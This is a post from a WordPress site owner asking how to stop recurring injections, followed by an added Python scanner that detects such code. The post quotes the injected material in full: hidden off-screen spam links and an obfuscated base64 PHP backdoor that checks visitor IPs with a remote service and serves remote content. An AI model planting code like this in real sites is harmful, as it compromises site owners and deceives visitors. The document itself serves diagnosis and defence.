Friday, 6 February 2015

How to prevent adding malicious code, found in hacked Wordpress website?



I have a website created using WordPress, with WooCommerce as the cart plugin. Recently I found it hacked, as it responded to an AJAX request with HTML code when it should have returned a JSON object as the response. When I checked the source files, no files had been replaced, but I found some unusual code appended at the end of 4 PHP files, including



  • wp-blog-header.php in the root directory

  • bookmark.php in wp-includes directory

  • header.php and footer.php in the theme directory


Following is the code that I found.



echo '<html>
<div style=\'left: -3565px; position: absolute; top: -4812px\'>
<a href="http://ift.tt/1v7mT1S">Youth Soccer Jerseys Wholesale</a>
<a href="http://ift.tt/1zZFoLA">Buy NFL Jerseys Wholesale</a>
<a href="http://ift.tt/1v7mT1T">Cheap Raider Jerseys</a>
<a href="http://ift.tt/1zZFnqP">Coach Canada Stores Online</a>
<a href="http://ift.tt/1v7mVqr">Womens Andrew Luck Limited Super Bowl Jersey</a>
<a href="http://ift.tt/1zZFp1X">Jerseys For Cheap</a>
<a href="http://ift.tt/1v7mT1U">Cheap Youth Soccer Jerseys</a>
<a href="http://ift.tt/1zZFnr2">Cycling Jerseys Cheap</a>
<a href="http://ift.tt/1v7mT1X">Kids Rob Gronkowski Pink Jersey</a>
<a href="http://ift.tt/1zZFnHj">Coach Handbags Marketing Strategy</a>
<a href="http://ift.tt/1zZFp1Y">Coach Purses Numbers</a>
<a href="http://ift.tt/1v7mTic">Wholesale Baseball Jerseys</a>
<a href="http://ift.tt/1v7mVqu">Youth Bobby Wagner Seahawks Jersey</a>
<a href="http://ift.tt/1zZFp21">Coach Glasses Outlet</a>
<a href="http://ift.tt/1v7mTid">Randall Cobb Navy Super Bowl Jersey</a>
<a href="http://ift.tt/1zZFnHw">Cheap Hockey Jerseys China</a>
<a href="http://ift.tt/1v7mTig">Coach Factory Kenosha Wi</a>
<a href="http://ift.tt/1zZFnHz">Wholesale Hockey Jerseys</a>
<a href="http://ift.tt/1v7mTih">Buy Jerseys Cheap</a>
<a href="http://ift.tt/1zZFp28">Cheap Dallas Stars Jerseys</a>
<a href="http://ift.tt/1v7mVqv">Cheap Kids NFL Jerseys</a>
<a href="http://ift.tt/1zZFnXQ">Cheap Baseball Jerseys From China</a>
<a href="http://ift.tt/1v7mTii">Coach Factory National Harbor</a>
</div></html>';


And I found the following code, which is not WordPress.



function q0($h1){$w2=curl_init();curl_setopt($w2,CURLOPT_URL,$h1);curl_setopt($w2,CURLOPT_RETURNTRANSFER,TRUE);$i3=curl_exec($w2);return $i3;}$h1=base64_decode('aHR0cDovL3d3dy5ncmVlbmhlYXJ0dWFlLmNvbS93cC1pbmNsdWRlcy9saWNlbnNlLnR4dA==');$d4=file_get_contents(base64_decode('aHR0cDovL2lwLm11c2VvdmlydHVhbGUubmV0L2NnaS1iaW4vaXBjaGVjay5jZ2k/aXA9').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')]);if($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]==base64_decode('Lw==') ||$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]==base64_decode('L2luZGV4LnBocA==')){if($d4){if($d4==base64_decode('ZmFsc2U=') or $d4==base64_decode('Zm9yYmlkZGVu') or $d4==base64_decode('Rm9yYmlkZGVu')){echo '';}else{echo file_get_contents($h1);exit;}}else{$d4=q0(base64_decode('aHR0cDovL2lwLm11c2VvdmlydHVhbGUubmV0L2NnaS1iaW4vaXBjaGVjay5jZ2k/aXA9').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')]);if($d4==base64_decode('ZmFsc2U=') or $d4==base64_decode('Zm9yYmlkZGVu') or $d4==base64_decode('Rm9yYmlkZGVu')){echo '';}else{echo q0($h1);exit;}}}


I cleaned up those files and changed the wp-admin, cPanel and FTP passwords, but the above code showed up in those files, this time with different links.


I'm still trying to figure out if there is a script within the server which exploits the source files.


Are there any plugins or something that I should use to prevent this?


Please help me to solve this. Thanks in advance.
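
A way to find every file carrying this kind of injection, shown as an added example that is not part of the original post: the Python scanner below flags PHP source that shows the traits of the two snippets quoted above (string literals hidden behind base64_decode, `$_SERVER` keys hidden the same way, a remote fetch beside them, and an HTML block positioned off-screen). The sample inputs are constructed, `example.invalid` is a placeholder host, and the function names are this example's own. It locates the appended code only; it does not identify how the files are being rewritten.

```python
import base64, binascii, re
from pathlib import Path

# Traits of the injected code quoted in the post.
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
REMOTE_FETCH = re.compile(r"\b(?:curl_exec|file_get_contents)\s*\(")
OFFSCREEN = re.compile(
    r"position:\s*absolute[^>]*?(?:left|top):\s*-\d{3,}px"
    r"|(?:left|top):\s*-\d{3,}px[^>]*?position:\s*absolute", re.I)

def decode_literals(php):
    """Return the plaintext of every base64_decode('...') string literal."""
    out = []
    for m in B64_CALL.finditer(php):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, ignore
        out.append(raw.decode("utf-8", "replace"))
    return out

def scan(php):
    """Return a sorted list of findings for one PHP source string."""
    findings, decoded = set(), decode_literals(php)
    if any(d.startswith(("http://", "https://")) for d in decoded):
        findings.add("base64-hidden URL")
    if any(d in ("REMOTE_ADDR", "REQUEST_URI") for d in decoded):
        findings.add("base64-hidden $_SERVER key")
    if decoded and REMOTE_FETCH.search(php):
        findings.add("remote fetch next to encoded strings")
    if OFFSCREEN.search(php):
        findings.add("off-screen positioned HTML block")
    return sorted(findings)

def scan_tree(root):
    """Map each *.php file under root to its findings; clean files are omitted."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

def _b64(s):  # helper used only to build the constructed samples
    return base64.b64encode(s.encode()).decode()

SAMPLE_INFECTED = (  # constructed input, modelled on the shape of the quoted code
    "<?php $u=base64_decode('" + _b64("http://example.invalid/links.txt") + "');"
    "$ip=$_SERVER[base64_decode('" + _b64("REMOTE_ADDR") + "')];echo file_get_contents($u);\n"
    "echo '<div style=\\'left: -3565px; position: absolute; top: -4812px\\'></div>';")
SAMPLE_CLEAN = "<?php $d = base64_decode($_POST['blob']); echo file_get_contents(__DIR__.'/a.txt');"
```

Calling `scan_tree()` on the WordPress root returns the flagged files with the reasons for each, which can then be compared against a fresh copy of the same WordPress, theme and plugin versions.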




